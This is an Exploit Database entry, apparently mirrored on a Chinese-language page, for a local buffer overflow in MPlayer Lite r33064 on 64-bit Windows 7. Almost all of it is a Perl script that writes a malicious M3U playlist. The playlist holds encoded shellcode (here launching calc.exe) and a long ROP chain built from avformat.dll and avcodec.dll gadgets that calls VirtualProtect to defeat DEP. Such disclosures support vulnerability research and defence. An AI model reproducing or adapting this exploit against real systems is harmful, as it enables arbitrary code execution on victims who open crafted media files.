MPlayer (r33064 Lite) – Local Buffer Overflow (ROP)

• Exploit Database
• 70 阅读

• 作者： Nate_M
  日期： 2011-04-06
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17124/

• #!/usr/bin/perl
  #
  # Exploit Title: Mplayer BOF + ROP Exploit
  # Date: 04\05\2011
  # Author: Nate_M (based on original WinXP [non ROP] exploit by C4SS!0 and h1ch4m)
  # Software Link: http://sourceforge.net/projects/mplayer-ww/files/MPlayer_Release/Revision%2033064/mplayer_lite_r33064.7z/download
  # Version: Lite 33064
  # Tested On: Win 7 x64 (doesn't work on 32 bit without heavy modification of offsets)
  # CVE : None
  
  use strict;
  use warnings;
  use IO::File;
  
  print q
  {
  	BOF/ROP exploit created by Nate_M
  	Now writing M3U file...
  
  };
  
  # windows/exec 			CMD=calc.exe
  # x86/shikata_ga_nai 	size 227
  # badchars = '\x00\x0d\x0a\x26\x2f\x5c\x3e\x3f'
  my $shellcode =
  "\xe8\xff\xff\xff\xff\xc8\x5a\x2b\xc9\xb1\x33" .
  "\xb8\xc4\xc4\xb8\xb3\x66\x81\xec\x10\x10" .
  "\x31\x42\x17\x83\xc2\x04\x03\x86\xd7\x5a\x46\xfa" .
  "\x30\x13\xa9\x02\xc1\x44\x23\xe7\xf0\x56\x57\x6c\xa0\x66" .
  "\x13\x20\x49\x0c\x71\xd0\xda\x60\x5e\xd7\x6b\xce\xb8\xd6" .
  "\x6c\xfe\x04\xb4\xaf\x60\xf9\xc6\xe3\x42\xc0\x09\xf6\x83" .
  "\x05\x77\xf9\xd6\xde\xfc\xa8\xc6\x6b\x40\x71\xe6\xbb\xcf" .
  "\xc9\x90\xbe\x0f\xbd\x2a\xc0\x5f\x6e\x20\x8a\x47\x04\x6e" .
  "\x2b\x76\xc9\x6c\x17\x31\x66\x46\xe3\xc0\xae\x96\x0c\xf3" .
  "\x8e\x75\x33\x3c\x03\x87\x73\xfa\xfc\xf2\x8f\xf9\x81\x04" .
  "\x54\x80\x5d\x80\x49\x22\x15\x32\xaa\xd3\xfa\xa5\x39\xdf" .
  "\xb7\xa2\x66\xc3\x46\x66\x1d\xff\xc3\x89\xf2\x76\x97\xad" .
  "\xd6\xd3\x43\xcf\x4f\xb9\x22\xf0\x90\x65\x9a\x54\xda\x87" .
  "\xcf\xef\x81\xcd\x0e\x7d\xbc\xa8\x11\x7d\xbf\x9a\x79\x4c" .
  "\x34\x75\xfd\x51\x9f\x32\xf1\x1b\x82\x12\x9a\xc5\x56\x27" .
  "\xc7\xf5\x8c\x6b\xfe\x75\x25\x13\x05\x65\x4c\x16\x41\x21" .
  "\xbc\x6a\xda\xc4\xc2\xd9\xdb\xcc\xa0\xbc\x4f\x8c\x08\x5b" .
  "\xe8\x37\x55";
  
  my $buf = "\x90" x 1000;
  $buf .= $shellcode;
  $buf .= "\x41" x (2368-length($buf));;
  $buf .= "0000";						# VirtualProtect addr
  $buf .= "1111";						# Return addr
  $buf .= "2222";						# lpAddress
  $buf .= "3333";						# dwsize
  $buf .= "4444";						# flNewProtect
  $buf .= "\x60\x63\x12\x6B";			# lpflOldProtect
  $buf .= "\x41" x 76;
  ##### Begin ROP Chain, create anchor in memory #####
  $buf .= pack('V',0x649ABC7B);		# PUSH ESP # POP EBX # POP ESI # RET	[avformat.dll]
  $buf .= "\x41" x 4;
  $buf .= pack('V',0x6B0402A9);		# MOV EAX,EBX # POP EBX # RET			[avcodec.dll]
  $buf .= "\x41" x 4;
  $buf .= pack('V',0x649509B4);		# XCHG EAX,EBP # RET					[avformat.dll]
  $buf .= pack('V',0x6AD9AC5C);		# XOR EAX,EAX # RET		0				[avcodec.dll]
  $buf .= pack('V',0x6AD5C728);		# ADD EAX,69 # RET		69				[avcodec.dll]
  $buf .= pack('V',0x6AD79CAC);		# DEC EAX # RET			68				[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x649509B4);		# XCHG EAX,EBP # RET					[avformat.dll]
  $buf .= pack('V',0x6AD5130E);		# SUB EAX,EDX # RET						[avcodec.dll]
  $buf .= pack('V',0x6AF1DCB5);		# XCHG EAX,ECX # RET					[avcodec.dll]
  $buf .= pack('V',0x6AFA5EE9);		# MOV EAX,ECX # RET						[avcodec.dll]
  $buf .= pack('V',0x649509B4);		# XCHG EAX,EBP # RET					[avformat.dll]
  
  ##### Find location of VirtualProtect() in kernel32.dll #####
  $buf .= pack('V',0x6AD9AC5C);		# XOR EAX,EAX # RET		0				[avcodec.dll]
  $buf .= pack('V',0x6AD5C728);		# ADD EAX,69 # RET		69				[avcodec.dll]
  $buf .= pack('V',0x6AD5C6FD) x 2;	# INC EAX # RET			6B				[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		D6				[avcodec.dll]
  $buf .= pack('V',0x6AD5C6FD);		# INC EAX # RET			D7				[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		1AE				[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		35C				[avcodec.dll]
  $buf .= pack('V',0x6AD5C6FD);		# INC EAX # RET			35D				[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		6BA				[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		D74				[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		1AE8			[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		35D0			[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6AF1DCB5);		# XCHG EAX,ECX # RET					[avcodec.dll]
  $buf .= pack('V',0x6AD5130E);		# SUB EAX,EDX # RET						[avcodec.dll]
  $buf .= pack('V',0x6AE8F378);		# MOV EAX,DWORD PTR DS:[EAX] # RET		[avcodec.dll]
  $buf .= pack('V',0x6AFCD525);		# XCHG EAX,ESI # RET					[avcodec.dll]
  $buf .= pack('V',0x6AD9AC5C);		# XOR EAX,EAX # RET		0				[avcodec.dll]
  $buf .= pack('V',0x6AD5C728);		# ADD EAX,69 # RET		69				[avcodec.dll]
  $buf .= pack('V',0x6AD79CAC) x 12;	# DEC EAX # RET			5D				[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		BA				[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		174				[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		2E8				[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		5D0				[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		BA0				[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		1740			[avcodec.dll]
  $buf .= pack('V',0x6AD5C6FD);		# INC EAX # RET			1741			[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		2E82			[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6AFCD525);		# XCHG EAX,ESI # RET					[avcodec.dll]
  $buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET						[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x649509B4);		# XCHG EAX,EBP # RET					[avformat.dll]
  $buf .= pack('V',0x6AE62D12);		# MOV DWORD PTR DS:[EAX],EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6AD5C6FD) x 4;	# INC EAX # RET							[avcodec.dll]
  
  ##### Find location of shellcode #####
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x649509B4);		# XCHG EAX,EBP # RET					[avformat.dll]
  $buf .= pack('V',0x6B0B79D2);		# MOV EAX,EDX # RET						[avcodec.dll]
  $buf .= pack('V',0x6AFCD525);		# XCHG EAX,ESI # RET					[avcodec.dll]
  $buf .= pack('V',0x6AD9AC5C);		# XOR EAX,EAX # RET		0				[avcodec.dll]
  $buf .= pack('V',0x6AD5C728);		# ADD EAX,69 # RET		69				[avcodec.dll]
  $buf .= pack('V',0x6AD79CAC) x 31;	# DEC EAX # RET			4A				[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		94				[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		128				[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		250				[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		4A0				[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		940				[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6AFCD525);		# XCHG EAX,ESI # RET					[avcodec.dll]
  $buf .= pack('V',0x6AD5130E);		# SUB EAX,EDX # RET						[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x649509B4);		# XCHG EAX,EBP # RET					[avformat.dll]
  $buf .= pack('V',0x6AE62D12);		# MOV DWORD PTR DS:[EAX],EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6AD5C6FD) x 4;	# INC EAX # RET							[avcodec.dll]
  $buf .= pack('V',0x6AE62D12);		# MOV DWORD PTR DS:[EAX],EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6AD5C6FD) x 4;	# INC EAX # RET							[avcodec.dll]
  
  ##### Find approx length of shellcode #####
  $buf .= pack('V',0x6AFCD525);		# XCHG EAX,ESI # RET					[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6AFCD525);		# XCHG EAX,ESI # RET					[avcodec.dll]
  $buf .= pack('V',0x6AE62D12);		# MOV DWORD PTR DS:[EAX],EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6AD5C6FD) x 4;	# INC EAX # RET							[avcodec.dll]
  
  ##### Set shellcode to read/write #####
  $buf .= pack('V',0x6AFCD525);		# XCHG EAX,ESI # RET					[avcodec.dll]
  $buf .= pack('V',0x6AD9AC5C);		# XOR EAX,EAX # RET		0				[avcodec.dll]
  $buf .= pack('V',0x6AD5C6FD) x 4;	# INC EAX # RET			4				[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		8				[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		10				[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		20				[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		40				[avcodec.dll]
  $buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
  $buf .= pack('V',0x6AFCD525);		# XCHG EAX,ESI # RET					[avcodec.dll]
  $buf .= pack('V',0x6AE62D12);		# MOV DWORD PTR DS:[EAX],EDX # RET		[avcodec.dll]
  
  ##### And profit #####
  $buf .= pack('V',0x6AD79CAC) x 16;	# DEC EAX # RET							[avcodec.dll]
  $buf .= pack('V',0x6AD44B94);		# XCHG EAX,ESP # RET
  
  
  $buf .= "\x41" x (5172-length($buf));;
  $buf .= "\xff\xff\xff\xff";
  $buf .= pack('V',0x64953AD6);		# ADD ESP,102C # POP EBX # POP ESI # POP EDI # POP EBP # RET
  $buf .= "\x41" x 2000;
  
  
  open(my $FILE,">Exploit.m3u") || die "**Error:\n$!\n";
  print $FILE "http:// ".$buf;
  close($FILE);
  print "\tFile Created With Sucess\n\n";
  

  PowerShell

  Copy